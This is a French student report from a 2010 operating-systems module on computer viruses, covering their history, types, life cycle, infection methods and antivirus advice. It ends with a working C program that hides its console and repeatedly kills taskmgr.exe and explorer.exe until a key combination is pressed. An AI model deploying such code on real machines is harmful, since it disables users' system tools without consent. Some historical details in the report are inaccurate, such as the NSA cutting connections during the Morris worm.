Virus Informatiques

31
Encadré par : M. Abderrahim SABOUR Virus Informatiques Projet de Fin de Module 25/04/2010 Module : Système d’Exploitation Réalisé par : Abdelouahed ERROUAGUI Ahmed JNAH Hamid IMIHI Yassine ELQANDIL

Transcript of Virus Informatiques

Page 1: Virus Informatiques

E n c a d r é p a r :

M. Abderrahim SABOUR

Virus InformatiquesProjet de Fin de Module

25/04/2010

M o d u l e : S y s t è m e d ’ E x p l o i t a t i o n

R é a l i s é p a r :

Abdelouahed ERROUAGUI

Ahmed JNAH

Hamid IMIHI

Yassine ELQANDIL

Page 2: Virus Informatiques

1 Virus Informatiques

SommaireI. Introduction :......................................................................................................................3

II. Définitions :.........................................................................................................................4

III. Historique :.........................................................................................................................4

IV. Type des virus :...................................................................................................................5

Vers :...................................................................................................................................5

Qu’est-ce que c’est ? 5

Le fonctionnement d'un ver dans les années 80 : 6

Les vers actuels : 6

Chevaux de Troie :..............................................................................................................6

Qu’est-ce que c’est ? 6

Les symptômes d'une infection : 7

Liste des ports utilisés habituellement par les troyens : 7

Canular :..............................................................................................................................8

Qu’est-ce qu’un hoax? 8

Virus du Secteur de Démarrage :.......................................................................................8

Qu’est-ce qu’un virus secteur de démarrage ? 8

Virus Macro :......................................................................................................................8

Qu’est-ce qu’un virus de macro ? 8

Mails :.................................................................................................................................9

Qu’est-ce que c’est ? 9

Les virus qui se propagent automatiquement par mail : 9

Qu’est-ce qu’un spam ? 10

Les pièces jointes : 10

Les spywares :...................................................................................................................10

Qu’est-ce que c’est ? 10

Comment cela fonctionne-t-il ? 11

V. Cycle De Vie Des Virus Informatique :...............................................................................11

Page 3: Virus Informatiques

2 Virus Informatiques

Création:...........................................................................................................................11

Gestation:.........................................................................................................................11

Reproduction (infection):.................................................................................................12

Activation:........................................................................................................................12

Découverte:......................................................................................................................12

Assimilation:.....................................................................................................................12

Elimination:......................................................................................................................12

VI. Modes d’infection :(fonctionnement)...............................................................................13

Recouvrement :................................................................................................................13

Ajout :...............................................................................................................................14

Cavité :..............................................................................................................................14

Point d'entrée obscure :...................................................................................................15

VII. Les Mesures pour protéger mon ordinateur contre les virus...........................................16

Antivirus/Pare-feu............................................................................................................16

Qu'est-ce qu'un antivirus ? 16

Qu'est-ce qu'un pare-feu (firewall) ? 16

Solutions...........................................................................................................................16

VIII. Exemple de virus...............................................................................................................18

Virus en C :........................................................................................................................18

IX. Conclusion :.......................................................................................................................22

Page 4: Virus Informatiques

3 Virus Informatiques

I. Introduction :

Dans le cadre des mini-projets du module système d’exploitation encadré par M.

Abderrahim SABOUR, nous avons eu l’occasion d’étudier le sujet : Virus Informatiques.

Nous avons décidé de prendre ce sujet comme mini-projet pour arriver à comprendre

comment les virus fonctionnent réellement, et pour décortiquer un virus programmé en C.

Dans ce rapport nous avons séparé notre étude en deux parties :

1. Partie Théorique :

1.1. Définition

1.2. Historique

1.3. Types des virus Informatique

1.4. Cycle de vie

1.5. Mode de fonctionnement

2. Partie Pratique :

2.1. Etude de cas d’un virus en C

Page 5: Virus Informatiques

4 Virus Informatiques

II. Définitions :

Un Virus est un programme susceptible d'entraîner des perturbations dans le

fonctionnement d'un ordinateur en dénaturant ses programmes exécutables ou ses fichiers

système. Il se transmet généralement par l'intermédiaire de disquettes ou encore par

téléchargement. La plupart des virus informatiques ajoutent quelques lignes de commandes

dans le fichier cible lorsqu'ils sont chargés en mémoire. Ces commandes ont généralement.

Actuellement, il existe de nombreux types de virus informatiques, toujours plus sournois et

moins visibles. Un virus capable de se propager à travers des réseaux informatiques est

parfois appelé ver, en particulier lorsqu'il se compose de plusieurs segments dispersés à

travers le réseau. Un virus peut rester dans la mémoire de l'ordinateur, constituant dans ce

cas un programme terminate-and-stay-resident (TSR) : on dit alors qu'il s'agit d'un virus

résident mémoire. Il peut en outre être encrypté, rendant ainsi sa détection et sa résorption

plus délicates. Enfin, il peut être polymorphe, évitant d'être décelé grâce à un changement

interne de sa structure.

III. Historique :

1949 : John Von Neumann présente les fondements théoriques des logiciels

autocopiés.

1960 : Un groupe de jeunes ingénieurs des laboratoires Bell met au point un jeu

informatique du nom de Core war : on installe dans la mémoire vive d'un ordinateur

deux programmes chargés de se retrouver. Le gagnant doit détruire l'autre en

s'autocopiant dans ses fichiers.

1984 : Le magazine Scientific American présente un guide pour fabriquer ses propres

virus.

1986 : Les frères Alvi, deux Pakistanais, fournissent à des touristes des copies de

logiciels pirates infectés du virus Brain. Ce serait le premier virus clairement identifié

et connu. Il a causé de sérieux dégâts sur les campus américains.

Page 6: Virus Informatiques

5 Virus Informatiques

1988 : Peace/Mac affiche son message de paix universelle sur les écrans de

possesseurs de Macintosh II.

1988 : Robent Morris est arrêté pour fraude informatique. Cet étudiant vient de

causer 15 millions de dollars de dommage sur Internet à cause de son virus.

1989 : Datacrime : trois virus font trembler les Pays-Bas et la France. La police

néerlandaise propose alors un ensemble de programmes informatiques à bas prix

pour lutter contre ces virus. C'est à cette époque que la France prend réellement

conscience de l'existence des virus.

1991 : Diffusé par une disquette vendue dans la revue Soft et Micro, le virus

Frodo/4096 arrive en France. Le Clusif (Club de la sécurité des systèmes

d'information français) propose sur son serveur une procédure de détection et de

décontamination pour lutter contre Frodo. Le serveur enregistre 8 000 connexions.

1992 : Le virus Michelangelo plonge la planète dans l'effroi. Ses effets restent

pourtant limités : 200 000 machines, au lieu des 5 à 15 millions annoncés.

1995 : Les premiers virus macros destructeurs apparurent en été.

1998 : D'après les chiffres publiés par Dr Salomon's, éditeur d'antivirus, on recensait

17 745 virus différents en 1998, contre 18 en 1989.

1999 : Le virus Mélissa se propage par internet. Caché dans un document Word,

Mélissa s'auto envoyait aux 50 premiers contacts contenus dans le carnet d'adresses

d'Outlook. Résultat : plus de 300 000 ordinateurs infectés. Internet devenait le

premier vecteur de contamination.

2000 : Le virus I Love You sème de nouveau la panique sur Internet.

2003 : Le virus MyDoom a beaucoup fait parler de lui, et la tête de l'auteur de ce

dernier reste mise à prix.

IV. Type des virus :

Vers : Qu’est-ce que c’est ?

Un ver informatique (en anglais Worm) est un programme qui peut s'auto-reproduire et se déplacer à travers un réseau en utilisant les mécanismes réseau, sans avoir réellement besoin

Page 7: Virus Informatiques

6 Virus Informatiques

d'un support physique ou logique (disque dur, programme hôte, fichier, etc.) pour se propager; un ver est donc un virus réseau.

Le fonctionnement d'un ver dans les années 80 :

La plus célèbre anecdote à propos des vers date de 1988. Un étudiant (Robert T. Morris, de Cornell University) avait fabriqué un programme capable de se propager sur un réseau, il le lança et, 8 heures après l'avoir lâché, celui-ci avait déjà infecté plusieurs milliers d'ordinateurs. C'est ainsi que de nombreux ordinateurs sont tombés en pannes en quelques heures car le « ver » (car c'est bien d'un ver dont il s'agissait) se reproduisait trop vite pour qu'il puisse être effacé sur le réseau. De plus, tous ces vers ont créé une saturation au niveau de la bande passante, ce qui a obligé la NSA à arrêter les connexions pendant une journée.

Voici la manière dont le ver de Morris se propageait sur le réseau :

Le ver s'introduisait sur une machine de type UNIX il dressait une liste des machines connectées à celle-ci

il forçait les mots de passe à partir d'une liste de mots

il se faisait passer pour un utilisateur auprès des autres machines

il créait un petit programme sur la machine pour pouvoir se reproduire

il se dissimulait sur la machine infectée

et ainsi de suite

Les vers actuels :

Les vers actuels se propagent principalement grâce à la messagerie (et notamment par le

client de messagerie Outlook) grâce à des fichiers attachés contenant des instructions

permettant de récupérer l'ensemble des adresses de courrier contenues dans le carnet

d'adresse et en envoyant des copies d'eux-mêmes à tous ces destinataires.

Ces vers sont la plupart du temps des scripts (généralement VB Script) ou des fichiers

exécutables envoyés en pièce jointe et se déclenchant lorsque l'utilisateur destinataire

clique sur le fichier attaché.

Chevaux de Troie : Qu’est-ce que c’est ?

Un cheval de Troie (informatique) est donc un

programme caché dans un autre qui exécute des

Page 8: Virus Informatiques

7 Virus Informatiques

commandes sournoises, et qui généralement donne un accès à l'ordinateur sur lequel il est

exécuté en ouvrant une porte dérobée

Les chevaux de Troie par porte dérobée sont des programmes qui autorisent d’autres

personnes que vous à prendre le contrôle de votre ordinateur au travers d’Internet.ils sont

parfois utilisés comme moyen d’installer un virus chez un utilisateur.

Les symptômes d'une infection :

Le principe des chevaux de Troie étant généralement (et de plus en plus) d'ouvrir un port de

votre machine pour permettre à un pirate d'en prendre le contrôle (par exemple voler des

données personnelles stockées sur le disque), le but du pirate est dans un premier temps

d'infecter votre machine en vous faisant ouvrir un fichier infecté contenant le troyen (trojan)

et dans un second temps d'accéder à votre machine par le port qu'il a ouvert.

Toutefois pour pouvoir s'infiltrer sur votre machine, le pirate doit généralement en connaître

l'adresse IP. Ainsi :

soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de particuliers

connecté par câble, etc.) auquel cas l'adresse IP peut être facilement récupérée

soit votre adresse IP est dynamique (affectée à chaque connexion), c'est le cas pour les

connexions par modem ; auquel cas le pirate doit scanner des adresses IP au hasard afin de

déceler les adresses IP correspondant à des machines infectées.

Liste des ports utilisés habituellement par les troyens :

port Troyen

21 Back construction, Blade runner, Doly, Fore, FTP trojan, Invisible FTP, Larva,

WebEx, WinCrash

23 TTS (Tiny Telnet Server)

25 Ajan, Antigen, Email Password Sender, Happy99, Kuang 2, ProMail trojan,

Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy

31 Agent 31, Hackers Paradise, Masters Paradise

41 Deep Throat

59 DMSetup

Page 9: Virus Informatiques

8 Virus Informatiques

Canular : Qu’est-ce qu’un hoax?

On appelle hoax (en français canular) un courrier électronique propageant une fausse information et poussant le destinataire à diffuser la fausse nouvelle à tous ses proches ou collègues.Ainsi, de plus en plus de personnes font suivre des informations reçues par courriel sans vérifier la véracité des propos qui y sont contenus. Le but des hoax est simple :

provoquer la satisfaction de son concepteur d'avoir berné un grand nombre de personnes

Les conséquences de ces canulars sont multiples : L'engorgement des réseaux en provoquant une masse de données superflues

circulant dans les infrastructures réseaux ; Une désinformation, c'est-à-dire faire admettre à de nombreuses personnes de faux

concepts ou véhiculer de fausses rumeurs (on parle de légendes urbaines) ; L'encombrement des boîtes aux lettres électroniques déjà chargées ; La perte de temps, tant pour ceux qui lisent l'information, que pour ceux qui la

relayent ; La dégradation de l'image d'une personne ou bien d'une entreprise ; L'incrédulité : à force de recevoir de fausses alertes les usagers du réseau risquent de

ne plus croire aux vraies.

Virus du Secteur de Démarrage :

Qu’est-ce qu’un virus secteur de démarrage ?

Les virus de secteur d'amorçage résident dans le premier secteur d'un support physique (disque dur ou disquette) ou du système d'exploitation (DOS ou Windows en général). Le contenu original du secteur est déplacé vers une autre zone du disque et le virus s'octroie cet emplacement.Ce positionnement leurs permets (ces virus sont amorcés dès le démarrage) d'être activé avant tout le reste, leur conférant ainsi, un contrôle important de l'ordinateur. Ces virus se chargent généralement en mémoire vive et y demeurent

jusqu'à la mise hors tension de l'ordinateur.Ils se distinguent principalement par leur mode de contagion, leurs conséquences ne varient pas, destruction de fichiers, de données voire reformatage. Heureusement, la plupart des virus de boot ne fonctionnent plus sous les nouveaux systèmes d'exploitation tels que Windows NT et tendent à disparaître progressivement.

Virus Macro : Qu’est-ce qu’un virus de macro ?

Page 10: Virus Informatiques

9 Virus Informatiques

Les virus Macros sont la plus grande menace à ce jour, ils se

propagent lorsqu’un document Microsoft Word, Excel ou

PowerPoint contaminé est exécuté. Un virus Macro est une

série de commandes permettant d’effectuer un certain

nombre de tâches automatiquement au sein des applications

ci-dessus. Le but non nuisible du langage de macro dans ces

applications est à l’origine de pouvoir créer des raccourcis

pour effectuer des tâches courantes, par exemple en une touche imprimer un document, le

sauvegarder et fermer l’application.

Les Virus Macros non supprimés se répandent très rapidement. L’ouverture d’un document

infecté va contaminer le document par défaut de l’application, et ensuite tous les

documents qui seront ouverts au sein de l’application. Les documents Word, Excel et

PowerPoint étant les documents les plus souvent partagés, envoyés par Internet, ceci

explique la diffusion rapide de ces virus. De plus le langage de programmation des Macros

est beaucoup plus facile à apprendre et moins compliqué qu’un langage de programmation

classique.

Mails : Qu’est-ce que c’est ?

Les virus des mails sont capables d’infecter les

utilisateurs à la lecture d’un mail. Ils ont

l’apparence de n’importe quel autre message,

mais contiennent pourtant un script caché qui

s’exécute dès que vous ouvrez le mail, ou même le

pré visualisez dans le panneau d’aperçu (si tant est que vous utilisiez Outlook avec la version

correcte d’Internet Explorer). Ce script peut changer les paramètres de votre système et

envoyer le virus à d’autres utilisateurs par mail.

Les virus qui se propagent automatiquement par mail :

Ce sont les virus typiques qui s’activent par un simple clic de l’utilisateur sur le document

joint. Celui-ci exécute un script qui utilise les programmes de messagerie pour faire suivre les

Page 11: Virus Informatiques

10 Virus Informatiques

documents infectés à d’autres utilisateurs de mails. Melissa, par exemple, envoie un

message aux cinquante premiers contacts de tous les carnets d’adresses auxquels Microsoft

Outlook peut accéder. D’autres virus s’envoient d’eux-mêmes à tous les contacts du carnet

d’adresse.

Qu’est-ce qu’un spam ?

Un spam est un mail non sollicité, qui fait souvent la promotion de plans d’enrichissement

rapide, d’emplois à domicile, de prêts bancaires ou de sites à caractère pornographique. Les

spams arrivent souvent avec de fausses références sur l’expéditeur, d’où la difficulté à réagir

contre leur auteur. Ces mails doivent simplement être détruits.

Les pièces jointes :

Le risque vient des logiciels de messageries qui sont installés sur votre ordinateur, surtout la

messagerie Outlook Express, client de messagerie fourni avec Windows XP, à cause de son

faible niveau de sécurité face aux agressions venant d'Internet.

Pour l'internaute, l'utilisation de la messagerie reste l'échange de courrier au format texte.

De façon plus avancée, vous pouvez :

- soit transmettre un fichier informatique : document Word, Excel, une image (type photo)

ou une archive compressée.

- soit recevoir un document d'un correspondant. Ces pièces-jointes correspondent aux

documents que l'on reçoit. .

Donc le danger vient de ces documents transmis, surtout s'il s'agit d'un fichier exécutable

avec une extension :.com, .bat, .exe même si la pièce-jointe est envoyée par une personne

connue, le document peut contenir un parasite : virus, vers... qui peut contaminer votre

ordinateur si ce fichier est exécuté. Si vous ouvrez par inadvertance un document infecté,

vous installez le parasite sur votre machine, le processus est enclenché, le virus va utiliser

votre carnet d'adresse pour se propager et contaminer les contacts de votre carnet.

Les spywares : Qu’est-ce que c’est ?

Page 12: Virus Informatiques

11 Virus Informatiques

Un spyware est un logiciel espion. C'est un programme ou un sous-programme conçu dans le

but de collecter des données personnelles sur ses utilisateurs et de les envoyer à son

concepteur ou à un tiers via Internet ou tout autre réseau informatique, sans avoir obtenu

au préalable une autorisation de l'utilisateur. Les spywares ont pour objectif primaire,

d’espionner le comportement de l’internaute et de transmettre ensuite, à son insu, les

informations collectées aux créateurs et éditeurs de logiciels afin d’alimenter une

gigantesque base de données.

Comment cela fonctionne-t-il ?

Un spyware « s’attrape » en général en naviguant sur Internet, ainsi qu'en téléchargeant

des logiciels gratuits (freeware) ou de publicité (adware). Il est tout particulièrement

fréquent dans les programmes de messagerie instantanée (ICQ), les lecteurs audio

(RealPlayer) et les systèmes «peer-to-peer » (Kazaa, Limewire).

Le spyware lui-même est un programme autonome ou associé à un logiciel prévu pour tout

autre chose. Il utilise alors des techniques comme l'ingénierie sociale ou celles des chevaux

de Troie.

V. Cycle De Vie Des Virus Informatique :

Les virus informatiques, tout comme les virus biologiques, possèdent un cycle de vie :

Création:

C’est la période que va passer un programmeur à développer un virus aussi féroce que

possible. La programmation se fait en code assembleur.

Gestation:

Il s'agit du procédé par lequel le virus est copié en un endroit stratégique afin que sa

diffusion soit la plus rapide possible. En général, la méthode consiste à infecter un

Page 13: Virus Informatiques

12 Virus Informatiques

programme très populaire puis à le distribuer par l'intermédiaire d'un serveur BBS, du

courrier électronique, de l'Internet ou au sein d'une entreprise, d'une école, etc.

Reproduction (infection):

Les virus, de par leur nature, cherchent à se reproduire. Un virus correctement conçu se

reproduira un nombre de fois important avant de s'activer. C'est là le meilleur moyen de

s'assurer de la pérennité d'un virus.

Activation:

Les virus possédant une routine de destruction ne s'activent que lorsque certaines

conditions sont réunies. Certains s'activent à certaines dates, d'autres possèdent un système

de compte à rebours interne. Même les virus ne possédant pas de telles routines et ne

nécessitant pas de procédure d'activation spécifique peuvent causer des dommages à votre

système en s'appropriant petit à petit l'ensemble de vos ressources.

Découverte:

Cette phase de l'existence d'un virus n'est pas forcément consécutive à son activation, mais

c'est généralement à ce moment-là qu'elle a lieu. La découverte d'un virus est le moment où

quelqu'un se rend compte de sa présence et parvient à l'isoler. Une fois cette opération

réalisée, le nouveau virus est généralement transmis au NCSA (National Computer Security

Association) à Washington DC où il est documenté puis distribué aux développeurs de

logiciels antivirus. La découverte a lieu la plupart du temps au moins un an avant qu'un virus

ne devienne une véritable menace pour la communauté informatique.

Assimilation:

Une fois la découverte faite, les développeurs de logiciels modifient leurs programmes pour

qu'ils puissent détecter la présence du virus. Cette phase dure entre un jour et six mois,

selon la compétence du développeur d'anti- virus.

Elimination:

Page 14: Virus Informatiques

13 Virus Informatiques

Si un nombre suffisant de développeurs d'antivirus sont capables de faire face au virus et si

suffisamment de personnes se procurent l'antivirus adéquat, il est possible d'annihiler un

virus. Dans les faits, aucun virus n'a réellement disparu, mais un grand nombre d'entre eux

ont cessé de constituer une menace réelle.

VI. Modes d’infection :(fonctionnement)Modes d'infection Les différentes techniques décrites ci-dessous s’appliquent principalement aux

virus programmes. Certaines d’entre elles s’appliquent néanmoins aux virus interprétés. Il existe en

effet des virus « par recouvrement » et « par ajout » parmi les macrovirus et les virus de script.

Recouvrement :

Un virus par recouvrement se contente d’écraser partiellement ou en totalité le programme qu’il

infecte. En conséquence, il le détruit au moins partiellement et rend son éradication impossible. Dans

certains cas, la taille du programme infecté n’est pas modifiée ; dans les cas contraires, celle-ci

s’ajuste à la taille du code viral et devient identique pour tout fichier infecté. La destruction, même

partielle, du code originel fait que celui-ci ne peut plus fonctionner correctement. Ces virus ne sont

généralement pas résident en mémoire. Ne réalisant plus la fonction souhaitée, l’utilisateur les

détecte rapidement. Les virus agissant par recouvrement ne réussissent jamais à se disséminer

largement.

Exemple : BadGuy, W32/HLL.ow.Jetto, LINUX/Radix.ow, VBS/Entice.ow.

Le virus écrase une partie du code du programme hôte

Page 15: Virus Informatiques

14 Virus Informatiques

Ajout :

Un virus par ajout modifie un programme sans le détruire. Ayant altéré le point d'entrée, le virus

s’exécute chaque fois que le programme est lancé, puis lui « rend la main ». Celui-ci fonctionne alors

de façon normale. La force d’un virus par ajout est que le programme infecté semble fonctionner

correctement ce qui peut retarder la détection du virus. La faiblesse d’un virus par ajout est que la

taille du programme est augmentée de la taille du virus, ce qui rend un repérage fondé sur la

variation de la taille des programmes possible.

Exemples: Cascade, Jérusalem, W95/Anxiety, W32/Chiton, VBS/Daydream.

Cavité :

Connaissant la structure spécifique du type des programmes à contaminer, le virus modifie le point

d'entrée du programme et insère tout ou partie de son code dans différentes zones non utilisées. Le

fichier COMMAND.COM fut longtemps la cible privilégiée de ce genre de virus ; dans ce cas, le code

viral pouvait se situer entre le bloc de code, le bloc des données, le bloc de pile « stack ». Cette

technique est maintenant régulièrement rencontrée dans les environnements Windows.

Le virus greffe son code sur le programme hôte

Page 16: Virus Informatiques

15 Virus Informatiques

Exemple : W95/Caw.

Point d'entrée obscure : Avant infection, l'analyse du programme cible permet un positionnement du point d'entrée du code

viral en un lieu variable au sein du fichier. Le point d’entrée du programme et les instructions qui s’y

situent sont inchangés. Lorsque cette technique est associée à une infection par cavité et à un

codage polymorphique, la détection devient très problématique. Cette technique est maintenant

régulièrement rencontrée dans les environnements Windows. Elle est très pénalisante pour les

antivirus qui doivent parfois élargir fortement leur zone de recherche. Exemple : W95/Orez.

VII.

Les Mesures pour protéger mon ordinateur contre les virusInternet est un outil de travail merveilleux, mais aussi un endroit où les virus voyagent en grand

nombre et en tout temps. Heureusement, il existe des moyens pour vous protéger contre ces virus,

dont la protection avec les logiciels antivirus.

Le virus morcelle son code en modules insérés dans les espaces inoccupés du

programme hôte

Le virus place son point d'entrée dans un endroit variable du programme hôte

Page 17: Virus Informatiques

16 Virus Informatiques

Si vous êtes aux prises de virus, soit vous n'avez pas installé un logiciel antivirus ou encore, votre

logiciel n'a pas réussi à tout arrêter. La première chose à faire est de lancer un scan de tous vos

disques installés dans votre ordinateur à l'aide de votre logiciel antivirus. Ensuite, lancez également

un scan de vos dossiers et fichiers à l'aide d'un logiciel anti-espion. De cette manière, vous éliminerez

les virus, ainsi que les logiciels espions qui se sont infiltrés dans votre ordinateur à votre insu.

Il existe plusieurs bons logiciels anti-virus gratuits sur le marché. Pour éliminer définitivement les

virus informatiques de votre PC, je vous recommande le logiciel Kaspersky 2010, la version familiale.

Une fois installé, le logiciel vous demandera l'autorisation pour lancer un scan complet de tout votre

ordinateur.

Antivirus/Pare-feu Qu'est-ce qu'un antivirus ?

Un antivirus est un programme capable de détecter la présence de virus sur un ordinateur et, dans la

mesure du possible, de désinfecter ce dernier. On parle ainsi d'éradication de virus pour désigner la

procédure de nettoyage de l'ordinateur. Chaque ordinateur, pour assurer sa sécurité sur internet,

doit disposer d'un seul antivirus et d'un seul pare-feu (firewall) (plusieurs antivirus ou plusieurs pare-

feu créent des conflits...).

Qu'est-ce qu'un pare-feu (firewall) ?

Un pare-feu (appelé aussi coupe-feu, garde-barrière ou firewall en anglais), est un système

permettant de protéger un ordinateur ou un réseau d'ordinateurs des intrusions provenant d'un

réseau tiers (notamment Internet). Le pare-feu est un système permettant de filtrer les paquets de

données échangés avec le réseau.

Solutions

Voici quelques moyens de protéger votre ordinateur contre les virus:

Solution 1: Les logiciels antivirus

Votre première ligne de défense consiste à installer un logiciel antivirus. Pour être plus sûr, installez

également un logiciel pare-feu, qui est maintenant intégré dans certains antivirus. Ce logiciel peut

balayer tous vos disques de virus et les neutraliser. Voici quelques éléments à considérer lors de

l'évaluation d'un logiciel antivirus.

- La compatibilité avec votre système d'exploitation. Assurez-vous que le logiciel fonctionne avec

votre système, en particulier si vous utilisez un vieux système d'exploitation comme Windows 98.

- Protection automatique de fond. Cela signifie que votre logiciel antivirus est constamment en action

Page 18: Virus Informatiques

17 Virus Informatiques

pour détecter les infections et les neutraliser comme elles apparaissent. Cela donne une tranquillité

d'esprit.

- La fréquence des mises à jour. Comme de nouveaux virus apparaissent chaque jour, vous aurez

besoin de mises à jour régulières. C'est encore mieux si elles se produisent automatiquement lorsque

vous vous connectez à Internet. Si la mise à jour automatique n'est pas incluse, vous aurez à vérifier

vous-même sur Internet les mises à jour qui doivent être installées dans votre logiciel de sécurité.

- La certification ICSA. La sécurité informatique dispose de normes pour les taux de détection des

logiciels antivirus. Assurez-vous que votre logiciel a la certification ICSA.

- Le support technique. C'est une bonne idée de choisir un forfait qui offre une assistance technique

gratuite, en ligne ou par le biais d'un numéro sans frais.

Solution 2: Méfiez-vous des extensions de nom de fichier

L'extension d'un nom de fichier est les trois éléments qui viennent après le point. Windows, par

défaut, a caché les extensions de nom de fichier, mais ce n'est pas une très bonne idée. Pour voir les

extensions d’un nom de fichier, cliquez sur le bouton Démarrer, ensuite sur Panneau de

configuration. Choisissez alors Options des dossiers et type de fichier. Désactivez la case à cocher

Masquer les extensions des fichiers dont le type est connu. Cliquez sur Appliquer.

Solution 3: Méfiez-vous des inconnus .exe

Un virus est un logiciel qui doit être exécuté afin de faire son sale boulot. Les virus ont généralement

comme extension, exe. Malheureusement, c'est le même dans Program Files. Alors, ne paniquez pas

si vous trouvez des fichiers nommés Word.exe ou Excel.exe sur votre système; il s’agit seulement de

vos logiciels Microsoft. Il suffit de ne jamais ouvrir un fichier avec une extension .exe si vous ne savez

pas la raison d'être de ce fichier.

Solution 4: Protéger les macros de MS Word, Excel et Powerpoint

Les macros virus sont un autre type de virus. Les macros sont des ensembles de commandes que les

utilisateurs peuvent enregistrer en tant que raccourcis pour exécuter des fonctions parfois longues

en quelques frappes de touche seulement. Un virus de macro peut verrouiller le clavier et même

faire la suppression de fichiers. Word, Excel, PowerPoint viennent tous avec une fonction pour vous

protéger contre les virus macros. Pour vous assurer que le vôtre est activé, cliquez sur le menu Outils,

Page 19: Virus Informatiques

18 Virus Informatiques

Macro et Sécurité. Sur l'onglet Niveau de sécurité, assurez-vous que moyen ou élevé est sélectionné.

Solution 5: Utiliser des mots de passe

Si vous partagez votre ordinateur, c'est une bonne idée d'attribuer à chacun un mot de passe. Les

mots de passe doivent être une combinaison d'au moins huit caractères, des lettres et des chiffres, et

de préférence n’ayant aucun sens.

Solution 6: Mise à jour du logiciel d'application

des Microsoft effectue constamment correctifs pour les failles de sécurité dans son système

d'exploitation et les logiciels d'application. Il est donc important d’effectuer les mises à jour de

Windows fréquemment. Pour obtenir les correctifs de sécurité les plus récents.

VIII. Exemple de virus

Virus en C :

/**********************************/

//DoubleStopProcess.c

//Compiler Dev-C++ 4.9.9.2

/**********************************/

#include <windows.h>

#include <windowsx.h>

#include <tlhelp32.h>//contient les variable de type PROCESSENTRY32

#include <process.h>

#include<stdlib.h>

#define Progy "taskmgr.exe"

#define Master "explorer.exe"

int func_termi(void);

int ID,XY,T3;

Page 20: Virus Informatiques

19 Virus Informatiques

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,

LPSTR lpCmdLine, int CmdShow)

{

char message[] = "This programme affects yout taskmanager :) stop me if u cann TAB+SHIFT+RETURN";

char title[] = "INFORMATION";

HWND nShow;

nShow = FindWindow("ConsoleWindowClass","ConsoleWindowClass");/**3kelt ta9riban**/

ShowWindow(nShow,SW_HIDE);/**set the specified window's show state.

SW_HIDE :Hides the window

and activates another window.**/

MessageBox(0,message,title,MB_OK| MB_ICONINFORMATION);/**si title est null

la valeur par défaut est ERROR**/

// _sleep(100);

func_termi();

}

int func_termi(void)

{

long code;

HANDLE Snap,Process;/**Le handle est un identifiant qui permet de désigner

l'objet de manière unique.

C'est juste une autre manière de référencer l'objet.

On ne parlera plus d'adresses pour les références

d'objets managés.**/

PROCESSENTRY32 proc32;/**contient des info sur un processus apres avoir

pris une snapshot des processus qui reside dans

Page 21: Virus Informatiques

20 Virus Informatiques

le systeme**/

// BOOL ServiceName;

while(1)

{

_sleep(100);

Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);/**Tlhelp32.h**/

/**Takes a snapshot of the specified processes,

as well as the heaps, modules, and threads

used by these processes.**/

/** Includes all processes

in the system in the snapshot.

To enumerate the processes**/

if(Snap==INVALID_HANDLE_VALUE)

{

MessageBox(0,"Sorry,no way!!!","Error",MB_OK | MB_ICONERROR);

exit(0);

}

proc32.dwSize=sizeof(PROCESSENTRY32);

if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767

)&&(GetAsyncKeyState(VK_UP)==-32767))

{

MessageBox(0,"U knew the key NOOO I'm GOOONE ;","BYE BYE",MB_OK | MB_ICONEXCLAMATION);

return EXIT_SUCCESS;

}

while((Process32Next(Snap,&proc32))==TRUE)

{

if(strcmp(proc32.szExeFile,Progy)==0){/**test d'egalité entre le proc courant et la chaine progy **/

ID=proc32.th32ProcessID;

Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);/**Required to retrieve

Page 22: Virus Informatiques

21 Virus Informatiques

certain information about

a process, such as its token,

exit code, and priority class*/

XY=GetExitCodeProcess(Process,&code);/**Retrieves the termination

status of the specified process.**/

Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);/**Opens an existing

local process object.**/

T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done!Taskmgr.exe is stopped!!!","Info",MB_OK);}

}

else if(strcmp(proc32.szExeFile,Master)==0){/**la meme chose pr l'autre proc**/

ID=proc32.th32ProcessID;

Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);

XY=GetExitCodeProcess(Process,&code);

Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);

T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done! Calc.exe is stopped!!!","Info",MB_OK);}

}

}

}

}

Page 23: Virus Informatiques

22 Virus Informatiques

IX. Conclusion :Le projet nous a appris comment bien lire un code, l’analyser, le modifier et essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme futur informaticiens.

Finalement, nous pouvons dire que ce mini-projet nous a été d’une grande utilité, vu que c’était un

défi qui mérite être attaquer.